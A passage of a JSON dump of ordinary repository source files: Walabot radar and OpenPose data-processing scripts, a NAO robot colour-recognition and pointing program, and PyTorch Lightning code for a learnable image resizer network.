"path": "/data/processed/readJSONtest.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import json\n\nreadTest = open('framedata_1.json')\ndata = json.load(readTest)\n\nprint(data[\"1\"][1][0][2])"
},
{
"alpha_fraction": 0.6160147786140442,
"alphanum_fraction": 0.6318710446357727,
"avg_line_length": 30.02458953857422,
"blob_id": "c19a202718203304d2abb0d1fcb3b89253ffdc47",
"content_id": "02a8962fe0158366aa1ef6510b3124a1020a6da4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3784,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 122,
"path": "/data_processor/data_processor.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWriting to process webcam footage only, until walabot is setup\n\ntodo: \nwrite JSON file every ?x? iterations to prevent memory exhaustion \n\nfunctionalize processing elements\n\nflag for selective capture of openpose data elements\n\nwalabot processing -> convert to cartesian coordinates\n dimensional reduction\n ?\n\"\"\"\n\nimport cv2 as cv\nimport argparse\nimport data_processor_functions as dpf\nimport os.path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport json\n\nPATHRAWDATA = '../data/raw/'\nVIDNAME = 'rbg_'\nVIDEXT = '.mp4'\nFRAMENAME = 'framedata_'\nFRAMEEXT = '.json'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-rangestart', action='store', dest='rangestart', help='Enter the starting data session number',\nrequired=True)\nparser.add_argument('-rangeend', action='store', dest='rangeend', help=\"Enter the ending data session number\",\nrequired=True)\nresults = parser.parse_args()\n\nstart = results.rangestart\nend = results.rangeend\n\n#verfiy data files in range\n#***add RF data file check after walabot is online***\ndpf.verifyDataFiles(start, end)\n\nbody_parts = dpf.MPIBodyParts()\npose_pairs = dpf.MPIPosePairs()\n\n#Required to refresh matplotlib heatmap overlay\nplt.ion()\n\nfor i in range(int(start), int(end)+1):\n vidName = PATHRAWDATA + VIDNAME + str(i) + VIDEXT\n frameDataName = PATHRAWDATA + FRAMENAME + str(i) + FRAMEEXT\n\n jsonFile = open(frameDataName)\n frameData = json.load(jsonFile)\n\n cap = cv.VideoCapture(vidName)\n\n length = int(cap.get(cv.CAP_PROP_FRAME_COUNT))\n print(str(length) + ' frames to process from ' + vidName)\n\n net = cv.dnn.readNet(os.path.relpath('openpose_pose_mpi_faster_4_stages.prototxt'), \n os.path.relpath('pose_iter_160000.caffemodel'))\n\n while True:\n hasFrame, frame = cap.read()\n currentFrame = cap.get(cv.CAP_PROP_POS_FRAMES)\n\n #End of video will trigger break\n if(not hasFrame):\n print('done')\n break\n\n frameWidth = frame.shape[1]\n frameHeight = frame.shape[0]\n\n blob = cv.dnn.blobFromImage(frame, 1.0 / 255, (640, 480), (0, 0, 0), swapRB=False, crop=False)\n net.setInput(blob)\n print('Processing frame ' + str(currentFrame))\n out = net.forward()\n \n probmapVIS1 = out[0, 0, :, :]\n probmapVIS2 = out[0, 1, :, :]\n probmapVIS3 = out[0, 2, :, :]\n probmapVIS4 = out[0, 3, :, :]\n \"\"\"\n for j in range(1, len(body_parts)):\n probmapVIS = probmapVIS + out[0, j, :, :]\n \"\"\"\n \n points = []\n for j in range(0, len(body_parts)):\n probmapPoints = out[0, j, :, :]\n _, conf, _, point = cv.minMaxLoc(probmapPoints)\n\n x = ((frameWidth * point[0]) / out.shape[3])\n y = ((frameHeight * point[1]) / out.shape[2])\n\n points.append((int(x), int(y)) if conf > .1 else None)\n\n \n #Currently appending all openpose data, probability part map and affinity map\n frameData[str(int(currentFrame))].append(out.tolist())\n frameData[str(int(currentFrame))].append(points)\n\n \n #***for visualization ONLY, remove for large data proccesing event***\n probmapVIS1 = cv.resize(probmapVIS1, (frameWidth, frameHeight))\n dpf.plotProbMap(probmapVIS1, frame)\n\n #***for point visualization ONLY, remove for large data processing event***\n #Points are already scaled to original image size\n for i in range(15):\n cv.circle(frame, points[i], 5, (25, 0, 255), 5)\n cv.imshow('frame', frame)\n \n\n #After each vid proccess, write to proccessed json file\n \n with open(PATHPROCCDATA + FRAMENAME + str(i) + FRAMEEXT, 'w') as fp:\n json.dump(frameData, fp)"
},
{
"alpha_fraction": 0.6429780125617981,
"alphanum_fraction": 0.6499153971672058,
"avg_line_length": 32.95977020263672,
"blob_id": "dc29e18bf0b965a7643d6915f3674cff96e8acf3",
"content_id": "1ac60644f0a53ee7821be743d15f2c90a629bb4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5910,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 174,
"path": "/walabot_testing/walabot_cpp.cpp",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "#include \"C:\\Program Files\\Walabot\\WalabotSDK\\inc\\WalabotAPI.h\"\n#include <iostream>\n#include <stdio.h>\n#include <string>\n\n#ifdef __LINUX__\n #define CONFIG_FILE_PATH \"/etc/walabotsdk.conf\"\n#else\n #define CONFIG_FILE_PATH \"C:\\\\Program Files\\\\Walabot\\\\WalabotSDK\\\\bin\\\\.config\"\n#endif\n#define CHECK_WALABOT_RESULT(result, func_name) \\\n{ \\\n if (result != WALABOT_SUCCESS) \\\n { \\\n const char* errorStr = Walabot_GetErrorString(); \\\n std::cout << std::endl << func_name << \" error: \" \\\n << errorStr << std::endl; \\\n std::cout << \"Press enter to continue ...\"; \\\n std::string dummy; \\\n std::getline(std::cin, dummy); \\\n return; \\\n } \\\n}\nvoid PrintSensorTargets(SensorTarget* targets, int numTargets)\n{\n int targetIdx;\n#ifdef __LINUX__\n printf(\"\\033[2J\\033[1;1H\");\n#else\n system(\"cls\");\n#endif\n if (numTargets > 0)\n {\n for (targetIdx = 0; targetIdx < numTargets; targetIdx++)\n {\n printf(\"Target #%d: \\nX = %lf \\nY = %lf \\nZ = %lf \\namplitude = %lf\\n\\n\\n \",\n targetIdx,\n targets[targetIdx].xPosCm,\n targets[targetIdx].yPosCm,\n targets[targetIdx].zPosCm,\n targets[targetIdx].amplitude);\n }\n }\n else\n {\n printf(\"No target detected\\n\");\n }\n}\nvoid SensorCode_SampleCode()\n{\n // --------------------\n // Variable definitions\n // --------------------\n WALABOT_RESULT res;\n // Walabot_GetSensorTargets - output parameters\n SensorTarget* targets;\n int numTargets;\n // Walabot_GetStatus - output parameters\n APP_STATUS appStatus;\n double calibrationProcess; // Percentage of calibration completed, if status is STATUS_CALIBRATING\n // Walabot_GetRawImageSlice - output parameters\n int* rasterImage;\n int sizeX;\n int sizeY;\n double sliceDepth;\n double power;\n // ------------------------\n // Initialize configuration\n // ------------------------\n // Walabot_SetArenaR - input parameters\n double minInCm = 30;\n double maxInCm = 200;\n double resICm = 3;\n // Walabot_SetArenaTheta - input parameters\n double minIndegrees = -15;\n double maxIndegrees = 15;\n double resIndegrees = 5;\n // Walabot_SetArenaPhi - input parameters\n double minPhiInDegrees = -60;\n double maxPhiInDegrees = 60;\n double resPhiInDegrees = 5;\n // ----------------------\n // Sample Code Start Here\n // ----------------------\n /*\n For an image to be received by the application, the following need to happen :\n 1) Connect\n 2) Configure\n 3) Calibrate\n 4) Start\n 5) Trigger\n 6) Get action\n 7) Stop/Disconnect\n */\n bool mtiMode = true;\n res = Walabot_Initialize(CONFIG_FILE_PATH);\n CHECK_WALABOT_RESULT(res, \"Walabot_Initialize\");\n \n // 1) Connect : Establish communication with Walabot.\n // ==================================================\n res = Walabot_ConnectAny();\n CHECK_WALABOT_RESULT(res, \"Walabot_ConnectAny\");\n // 2) Configure : Set scan profile and arena\n // =========================================\n // Set Profile - to Sensor. \n // Walabot recording mode is configured with the following attributes:\n // -> Distance scanning through air; \n // -> high-resolution images\n // -> slower capture rate \n res = Walabot_SetProfile(PROF_SENSOR);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetProfile\");\n // Setup arena - specify it by Cartesian coordinates(ranges and resolution on the x, y, z axes); \n // In Sensor mode there is need to specify Spherical coordinates(ranges and resolution along radial distance and Theta and Phi angles).\n res = Walabot_SetArenaR(minInCm, maxInCm, resICm);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetArenaR\");\n // Sets polar range and resolution of arena (parameters in degrees).\n res = Walabot_SetArenaTheta(minIndegrees, maxIndegrees, resIndegrees);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetArenaTheta\");\n // Sets azimuth range and resolution of arena.(parameters in degrees).\n res = Walabot_SetArenaPhi(minPhiInDegrees, maxPhiInDegrees, resPhiInDegrees);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetArenaPhi\");\n FILTER_TYPE filterType = mtiMode ?\n FILTER_TYPE_MTI : //Moving Target Identification: standard dynamic-imaging filter\n FILTER_TYPE_NONE;\n res = Walabot_SetDynamicImageFilter(filterType);\n CHECK_WALABOT_RESULT(res, \"Walabot_SetDynamicImageFilter\");\n // 3) Start: Start the system in preparation for scanning.\n // =======================================================\n res = Walabot_Start();\n CHECK_WALABOT_RESULT(res, \"Walabot_Start\");\n // 4) Start Calibration - only if MTI mode is not set - (there is no sense \n // executing calibration when MTI is active)\n // ========================================================================\n if (!mtiMode) \n {\n // calibrates scanning to ignore or reduce the signals\n res = Walabot_StartCalibration();\n CHECK_WALABOT_RESULT(res, \"Walabot_StartCalibration\");\n }\n bool recording = true;\n while (recording)\n {\n // calibrates scanning to ignore or reduce the signals\n res = Walabot_GetStatus(&appStatus, &calibrationProcess);\n CHECK_WALABOT_RESULT(res, \"Walabot_GetStatus\");\n // 5) Trigger: Scan(sense) according to profile and record signals to be \n // available for processing and retrieval.\n // ====================================================================\n res = Walabot_Trigger();\n CHECK_WALABOT_RESULT(res, \"Walabot_Trigger\");\n // 6) Get action : retrieve the last completed triggered recording \n // ================================================================\n res = Walabot_GetSensorTargets(&targets, &numTargets);\n CHECK_WALABOT_RESULT(res, \"Walabot_GetSensorTargets\");\n res = Walabot_GetRawImageSlice(&rasterImage, &sizeX, &sizeY, &sliceDepth, &power);\n CHECK_WALABOT_RESULT(res, \"Walabot_GetRawImageSlice\");\n // ******************************\n // TODO: add processing code here\n // ******************************\n PrintSensorTargets(targets, numTargets);\n }\n // 7) Stop and Disconnect.\n // ======================\n res = Walabot_Stop();\n CHECK_WALABOT_RESULT(res, \"Walabot_Stop\");\n res = Walabot_Disconnect();\n CHECK_WALABOT_RESULT(res, \"Walabot_Disconnect\");\n Walabot_Clean();\n CHECK_WALABOT_RESULT(res, \"Walabot_Clean\");\n}\nint main()\n{\n SensorCode_SampleCode();\n}\n\n"
},
{
"alpha_fraction": 0.6522058844566345,
"alphanum_fraction": 0.6882352828979492,
"avg_line_length": 21.098360061645508,
"blob_id": "f0a49ea5cf3468427258eff2280421117ac7c0c9",
"content_id": "9b1a470241c9dd0d35c29c05560d49f0458a1e3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1360,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 61,
"path": "/walabot_testing/walabot_testing.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import WalabotAPI as wala\nimport time\nimport keyboard\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \nimport time\n\nTHRESHOLD = 15\n\nwala.Init()\nwala.SetSettingsFolder()\nwala.ConnectAny()\nwala.SetProfile(wala.PROF_SENSOR)\nwala.SetThreshold(THRESHOLD)\nwala.SetDynamicImageFilter(wala.FILTER_TYPE_NONE)\n\nmin_R, max_R, res_R = 216, 762, 8\nwala.SetArenaR(min_R, max_R, res_R)\n\nmin_Theta, max_Theta, res_Theta = -19, 19, 8\nwala.SetArenaTheta(min_Theta, max_Theta, res_Theta)\n\nmin_Phi, max_Phi, res_Phi = -43, 43, 8\nwala.SetArenaPhi(min_Phi, max_Phi, res_Phi)\n\nwala.Start()\nwala.StartCalibration()\n\ncalibration_status, calibration_progress = wala.GetStatus()\nwala.Trigger()\n\nwhile calibration_status == wala.STATUS_CALIBRATING and calibration_progress < 100:\n wala.Trigger()\n print(\"Calibrating \" + str(calibration_progress) + '%')\n calibration_status, calibration_progress = wala.GetStatus()\n\n#create initial images\n\nwala.Trigger()\nwala_data = wala.GetRawImage()\nwala_data_np = np.array(wala_data[0])\n \nsum = 0.0\ncount = 0\n\nwhile True:\n\n start = time.time()*1000\n wala.Trigger()\n\n wala_data = wala.GetRawImage()\n\n end = time.time()*1000\n sum = sum + (end-start)\n count += 1\n\n if(count%20 == 0):\n print('fps: {}'.format(1000/(sum/20)))\n sum = 0.0\n count = 0 \n \n "
}
] | 11 |
burmeisc/ColourRobo
|
https://github.com/burmeisc/ColourRobo
|
aa59ac71e6c55e1b8fbc5ade180594f551b991bd
|
189084d66316b629a5a29dadc3d6ad483aa34dba
|
008138bfe40c6b4c731577c2255a65e961f5136e
|
refs/heads/master
| 2021-05-10T18:46:38.283358 | 2018-05-22T10:53:05 | 2018-05-22T10:53:05 | 118,134,951 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5873897671699524,
"alphanum_fraction": 0.6011107563972473,
"avg_line_length": 30.665517807006836,
"blob_id": "6fea2f15643f288c3f3e44e4a0b2869ba558f25a",
"content_id": "13641860140794fe5429dd6730bae65ddbc7d634",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9183,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 290,
"path": "/main_listen_loop.py",
"repo_name": "burmeisc/ColourRobo",
"src_encoding": "UTF-8",
"text": "\"\"\" Cannot be tested on simulated robot\n\n Repeats color when heard.\n\"\"\"\n\nimport sys\nimport time\nimport almath\nfrom naoqi import ALProxy\nfrom naoqi import ALBroker\nfrom naoqi import ALModule\nfrom math import pi, sin, atan2\nfrom vision.vision_showimages import ImageWidget\nfrom PyQt4.QtGui import QApplication\nfrom optparse import OptionParser\nfrom vision.color_recognition import ColorDetectionModule\n\nNAO_IP = \"nao2.local\"\nPORT = 9559\nCameraID = 1\n\n# Global variable to store the ColourOrder module instance\nColourOrder = None\nmemory = None\nColorDetection = None\ncolorBlob = None\n\n\nclass ColourOrderModule(ALModule):\n \"\"\" A simple module able to react\n to speech events\n\n \"\"\"\n def __init__(self, name):\n ALModule.__init__(self, name)\n # No need for IP and port here because\n # we have our Python broker connected to NAOqi broker\n\n # Create a proxy to ALTextToSpeech for later use\n self.tts = ALProxy(\"ALTextToSpeech\")\n self.blobProxy = ALProxy(\"ALColorBlobDetection\")\n self.motionProxy = ALProxy(\"ALMotion\")\n self.postureProxy = ALProxy(\"ALRobotPosture\")\n self.postureProxy.goToPosture(\"Stand\", 0.5)\n self.moovementProxy = ALProxy(\"ALAutonomousMoves\")\n self.moovementProxy.setExpressiveListeningEnabled(False) #hoer auf rumzuzappeln\n self.videoProxy = ALProxy(\"ALPhotoCapture\")\n self.distance = 500#mm x-distance between camera and blob = b\n print \"CameraID = %s\"%self.videoProxy.getCameraID()\n #print \"Resolution = %s\"%self.videoProxy.setResolution()\n print \"Resolution = %s\"%self.videoProxy.getResolution()\n global memory\n memory = ALProxy(\"ALMemory\")\n\n speech = ALProxy(\"ALSpeechRecognition\")\n\n #module for detecting color through vision\n #global ColorDetection\n #ColorDetection = ColorDetectionModule(\"ColorDetection\")\n\n # List of colours which can be recognized\n speech.pause(True)\n speech.setVocabulary([\"red\", \"blue\", \"black\", \"green\"], False)\n speech.pause(False)\n\n # Subscribe to the WordRecognized event:\n memory.subscribeToEvent(\"WordRecognized\",\n \"ColourOrder\",\n \"onColorHeard\")\n #for video stream\n '''\n app = QApplication(sys.argv)\n myWidget = ImageWidget(NAO_IP, PORT, CameraID)\n myWidget.show()\n '''\n\n\n def onColorHeard(self, *_args):\n \"\"\" This will be called each time a colour order (spoken) is\n detected.\n\n \"\"\"\n #read recognized word from memory\n words = memory.getData(\"WordRecognized\")\n\n # Unsubscribe to the event when reacting,\n # to avoid repetitions\n memory.unsubscribeToEvent(\"WordRecognized\",\n \"ColourOrder\")\n\n color = words[0]\n str = \"I'll look for a %s blob!\"%color\n #self.tts.say(str)\n print str\n #time.sleep(30)\n if color == \"red\":\n red = 255\n green = 0\n blue = 0\n elif color == \"blue\":\n red = 100\n green = 50\n blue = 255\n elif color == \"green\":\n red = 0\n green = 255\n blue = 0\n elif color == \"black\":\n red = 255\n green = 255\n blue = 255\n else:\n self.tts.say(\"Weird! I should no be able to see this color!\")\n\n #Call ColorDetection from vision module, so colour can be recgonized\n #subscribes to BlopDetection event\n\n self.subscribeToBlopDetection(red, green, blue)\n time.sleep(2)\n\n def subscribeToBlopDetection(self, red, green, blue):\n \"\"\"subscribe to blop event\"\"\"\n\n self.blobProxy.setColor(red, green, blue, 50)\n self.blobProxy.setObjectProperties(10, 2) #TODO testen ob das der abstand ist\n #self.blobProxy.setObjectProperties(10, self.distance/1000)\n\n\n\n memory.subscribeToEvent(\"ALTracker/ColorBlobDetected\",\n \"ColourOrder\",\n \"onColorDetected\")\n\n\n print(\"subscribe to Blop\")\n\n def onColorDetected(self, *_args):\n \"\"\" This will be called each time a color is\n detected.\n\n \"\"\"\n # Unsubscribe to the event when talking,\n # to avoid repetitions\n\n memory.unsubscribeToEvent(\"ALTracker/ColorBlobDetected\",\n \"ColourOrder\")\n\n circle_coordinates = self.blobProxy.getCircle()\n if not circle_coordinates:\n print \"Circle to small\"\n # Subscribe again to the event\n memory.subscribeToEvent(\"ALTracker/ColorBlobDetected\",\n \"ColourOrder\", \"onColorDetected\")\n else:\n print \"circle_coordinates = %s\"%(circle_coordinates[0]/160)\n str = \"I can see one over there!\"\n #self.tts.say(str)\n print str\n self.point_at_circle(circle_coordinates[0]/160)\n time.sleep(2)\n\n # Subscribe again to the event\n memory.subscribeToEvent(\"WordRecognized\",\n \"ColourOrder\",\n \"onColorHeard\")\n\n\n def point_at_circle(self, x_value_pic):\n\n\n # Wake up robot-----------------------------------------------------\n self.motionProxy.wakeUp()\n\n # Calculate angle of arm in order to point at blob------------------\n # set fixet roboter values\n camera_horizontal_angle = 60.97*almath.TO_RAD #=alhpa\n dy_shoulder = 98#mm #98mm wenn genau mitte bei keiner kopfdrehung\n if dy_shoulder < 32:\n print \"WARNING! blob is too close for pointing!\"\n\n print\"y value of blob in percent from left pic side is %s\"%x_value_pic\n\n # use sin(alpha)/a = sin(beta)/b to get horizon_length\n\n print\"distance of blob is %s\"%self.distance\n\n horizon_length = 2*self.distance*sin(camera_horizontal_angle/2)/sin(90-camera_horizontal_angle/2) #=a, betha=180-90-60.97/2\n #horizon_length = 600\n\n print\"Horizon length is %s\"%horizon_length\n\n x_length = x_value_pic * horizon_length\n print\"y length of blob in percent from left pic side is %s\"%x_length\n\n distance_to_center = abs(x_length - (horizon_length/2))\n print\"y distance of blob to robot center is %s\"%distance_to_center\n\n if x_value_pic > 0.5:#user right arm\n target = \"RArm\"\n ellbow_roll = -pi/2\n\n distance_to_shoulder = dy_shoulder-distance_to_center #TODO checken was passiert wenn negativ? (weiter rechts als re. schulter)\n angle_for_pointing = atan2(distance_to_shoulder, self.distance)\n handName = \"RHand\"\n\n else:\n target = \"LArm\"\n distance_to_shoulder = distance_to_center-dy_shoulder\n ellbow_roll = pi/2\n angle_for_pointing = atan2(distance_to_shoulder, self.distance)\n handName = \"LHand\"\n\n print\"y distance of blob to robots right shoulder is %s\"%distance_to_shoulder\n\n targetAngles = [0, angle_for_pointing,ellbow_roll,0,0,pi]\n\n print \"angle = %s\"%(angle_for_pointing*almath.TO_DEG)\n\n #moove arm --------------------------------------------------------\n maxSpeedFraction = 0.2\n self.motionProxy.angleInterpolationWithSpeed(target, targetAngles, maxSpeedFraction)\n self.motionProxy.openHand(handName);\n\n time.sleep(5)\n\n targetAngles = [pi/2,0,0,0,0,0]\n self.motionProxy.angleInterpolationWithSpeed(target, targetAngles, maxSpeedFraction)\n\n def exit_program(self):\n self.motionProxy.rest()\n\ndef main():\n \"\"\" Main entry point\n\n \"\"\"\n parser = OptionParser()\n parser.add_option(\"--pip\",\n help=\"Parent broker port. The IP address or your robot\",\n dest=\"pip\")\n parser.add_option(\"--pport\",\n help=\"Parent broker port. The port NAOqi is listening to\",\n dest=\"pport\",\n type=\"int\")\n parser.set_defaults(\n pip=NAO_IP,\n pport=9559)\n\n (opts, args_) = parser.parse_args()\n pip = opts.pip\n pport = opts.pport\n\n # We need this broker to be able to construct\n # NAOqi modules and subscribe to other modules\n # The broker must stay alive until the program exists\n myBroker = ALBroker(\"myBroker\",\n \"0.0.0.0\", # listen to anyone\n 0, # find a free port and use it\n pip, # parent broker IP\n pport) # parent broker port\n\n\n # Warning: ColourOrder must be a global variable\n # The name given to the constructor must be the name of the\n # variable\n global ColourOrder\n ColourOrder = ColourOrderModule(\"ColourOrder\")\n\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n print\n print \"Interrupted by user, shutting down\"\n ColourOrder.exit_program()\n myBroker.shutdown()\n sys.exit(0)\n #TODO\n #Fotos machen\n '''\n [E] 6107 qitype.dynamicobject: \tALPythonModule::execute\n\tcalling ColourOrder.onColorDetected\n <type 'exceptions.TypeError'>\n 'NoneType' object has no attribute '__getitem__'\n\n '''\n\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 1 |
bilzard/resize_network_cv
|
https://github.com/bilzard/resize_network_cv
|
9ab5739b257192f78de2aeb88c335fa9f35cd730
|
93d6d56426f88e0bc4feee593a731fcd62a6f7b4
|
3e1ee6580fd36f776d797ab69a71cd7a849445ce
|
refs/heads/main
| 2023-07-25T05:48:42.084343 | 2021-06-02T06:18:50 | 2021-06-02T06:18:50 | 396,613,190 | 0 | 0 |
Apache-2.0
| 2021-08-16T04:16:08 | 2021-08-14T23:32:33 | 2021-06-02T06:44:32 | null |
[
{
"alpha_fraction": 0.6098265647888184,
"alphanum_fraction": 0.6589595079421997,
"avg_line_length": 33.599998474121094,
"blob_id": "3f57ea383d7fa0975de4de0f09bfcaf8f84fb294",
"content_id": "8c1ce55e82608be9d1296e80df05d8690860512e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 10,
"path": "/src/models/base_model.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from torchvision.models import resnet50\nimport torch.nn as nn\n\n\ndef get_base_model(in_channels: int, num_classes: int = 10):\n model = resnet50(pretrained=False)\n model.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2,\n padding=3, bias=False)\n model.fc = nn.Linear(2048, num_classes)\n return model\n"
},
{
"alpha_fraction": 0.5613174438476562,
"alphanum_fraction": 0.5620182156562805,
"avg_line_length": 28.72916603088379,
"blob_id": "fffdfe990198d50dca55fb7f5a6e637c3dc351b1",
"content_id": "50df982d9f97549de2657f71250b808ffc4305c2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1427,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 48,
"path": "/src/trainer.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from omegaconf import DictConfig\nimport hydra\n\nimport os\nimport torch\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\nfrom model import Module\nfrom data import DataModule\n\n\[email protected](config_name=\"config\")\ndef main(cfg: DictConfig):\n dm = DataModule(cfg)\n dm.setup()\n model = Module(cfg, dm.val_length)\n\n if cfg.apply_resizer_model:\n path = hydra.utils.to_absolute_path(cfg.trained_path)\n path = os.path.abspath(path)\n path = os.path.join(path, f\"{cfg.data.name}.ckpt\")\n ckpt = torch.load(path)['state_dict']\n state_dict = {}\n for k, v in ckpt.items():\n k = k[k.find('.')+1:]\n state_dict[k] = v\n model.base_model.load_state_dict(state_dict)\n\n cfg = cfg.trainer\n callback = ModelCheckpoint(filename=\"{epoch}-{val_acc}\",\n monitor='val_acc',\n save_last=True,\n mode='max')\n\n trainer = Trainer(gpus=cfg.gpus,\n benchmark=True,\n callbacks=[callback],\n check_val_every_n_epoch=cfg.check_val_every_n_epoch,\n max_epochs=cfg.epochs,\n precision=cfg.precision,\n gradient_clip_val=cfg.gradient_clip_value)\n\n trainer.fit(model, datamodule=dm)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5384893417358398,
"alphanum_fraction": 0.5580050349235535,
"avg_line_length": 39.10144805908203,
"blob_id": "3603acf72f707466cb0cbe2ecbbd560a69508423",
"content_id": "157a320718dba2236448c26ec7f3f159e0181231",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2767,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 69,
"path": "/src/data.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from omegaconf import DictConfig\nfrom hydra.utils import to_absolute_path\nfrom pytorch_lightning import LightningDataModule\n\nimport os\n\nimport torch\nimport torchvision.transforms as T\nfrom torchvision.datasets import ImageFolder\nimport torchvision.io as io\nfrom functools import partial\n\n\nclass DataModule(LightningDataModule):\n def __init__(self, cfg: DictConfig):\n super().__init__()\n # Hydra changes working directory, so change cfg.data.root to\n # reflect this change\n cfg.data.root = to_absolute_path(cfg.data.root)\n cfg.data.root = os.path.abspath(cfg.data.root)\n\n self.cfg = cfg.data\n self.dataset_path = os.path.join(self.cfg.root, self.cfg.name)\n\n valid_names = (\"imagenette2\", \"imagewoof2\")\n if self.cfg.name not in valid_names:\n raise ValueError(f\"Incorrect \\\"data.name: {self.cfg.name}. The \"\n f\"valid options are {valid_names}\")\n\n if cfg.apply_resizer_model:\n image_size = self.cfg.resizer_image_size\n else:\n image_size = self.cfg.image_size\n\n self.image_read_func = partial(io.read_image,\n mode=io.image.ImageReadMode.RGB)\n\n self.train_transform = T.Compose([\n T.Resize((image_size, image_size)),\n T.RandomHorizontalFlip(),\n T.ConvertImageDtype(torch.float32),\n T.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\n self.test_transform = T.Compose([\n T.Resize((image_size, image_size)),\n T.ConvertImageDtype(torch.float32),\n T.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\n def setup(self, stage=None):\n self.train_data = ImageFolder(os.path.join(self.dataset_path, 'train'),\n transform=self.train_transform,\n loader=self.image_read_func)\n self.val_data = ImageFolder(os.path.join(self.dataset_path, 'val'),\n transform=self.test_transform,\n loader=self.image_read_func)\n self.val_length = len(self.val_data)\n\n def train_dataloader(self):\n return torch.utils.data.DataLoader(dataset=self.train_data,\n batch_size=self.cfg.batch_size,\n shuffle=True,\n num_workers=self.cfg.num_workers)\n\n def val_dataloader(self):\n return torch.utils.data.DataLoader(dataset=self.val_data,\n batch_size=self.cfg.batch_size,\n num_workers=self.cfg.num_workers)\n"
},
{
"alpha_fraction": 0.6222222447395325,
"alphanum_fraction": 0.6222222447395325,
"avg_line_length": 31.5,
"blob_id": "ad23db44a2fbb1a13441457fb4449735b678f81c",
"content_id": "3b96c947b9b3854ede884dcae530605d36b30443",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 585,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 18,
"path": "/src/models/__init__.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from omegaconf import DictConfig\n\nfrom .base_model import get_base_model\nfrom .resizer import Resizer\n\n\ndef get_model(name: str, cfg: DictConfig):\n if name == \"resizer\":\n return Resizer(cfg)\n elif name == \"base_model\":\n if cfg.apply_resizer_model:\n in_channels = cfg.resizer.out_channels\n else:\n in_channels = cfg.resizer.in_channels\n return get_base_model(in_channels, cfg.data.num_classes)\n else:\n raise ValueError(f\"Incorrect name={name}. The valid options are\"\n \"('resizer', 'base_model')\")\n"
},
{
"alpha_fraction": 0.5506072640419006,
"alphanum_fraction": 0.5552342534065247,
"avg_line_length": 27.816667556762695,
"blob_id": "8e4c62dd74ed692a7348ff4ad9321f1f20f946f6",
"content_id": "ca607ab07af7276c8fd46a5e4cbf322f59a64a08",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1729,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 60,
"path": "/src/model.py",
"repo_name": "bilzard/resize_network_cv",
"src_encoding": "UTF-8",
"text": "from omegaconf import DictConfig\n\nimport torch\nimport torch.nn as nn\nfrom pytorch_lightning import LightningModule\n\nfrom models import get_model\n\n\nclass Module(LightningModule):\n def __init__(self, cfg: DictConfig, val_length):\n super().__init__()\n self.cfg = cfg.trainer\n self.val_length = val_length\n if cfg.apply_resizer_model:\n self.resizer_model = get_model('resizer', cfg)\n else:\n self.resizer_model = None\n\n self.base_model = get_model('base_model', cfg)\n self.loss = nn.CrossEntropyLoss()\n\n def forward(self, x):\n if self.resizer_model is not None:\n x = self.resizer_model(x)\n x = self.base_model(x)\n return x\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n y_hat = self(x)\n loss = self.loss(y_hat, y)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n y_hat = self(x)\n acc = (y_hat.argmax(-1) == y).sum().item()\n return acc\n\n def validation_epoch_end(self, validation_step_outputs):\n acc = 0\n for pred in validation_step_outputs:\n acc += pred\n acc = acc / self.val_length\n self.log('val_acc', acc, on_step=False, on_epoch=True, prog_bar=True)\n\n def configure_optimizers(self):\n optim = torch.optim.SGD(self.parameters(), lr=self.cfg.lr,\n momentum=0.9)\n scheduler = 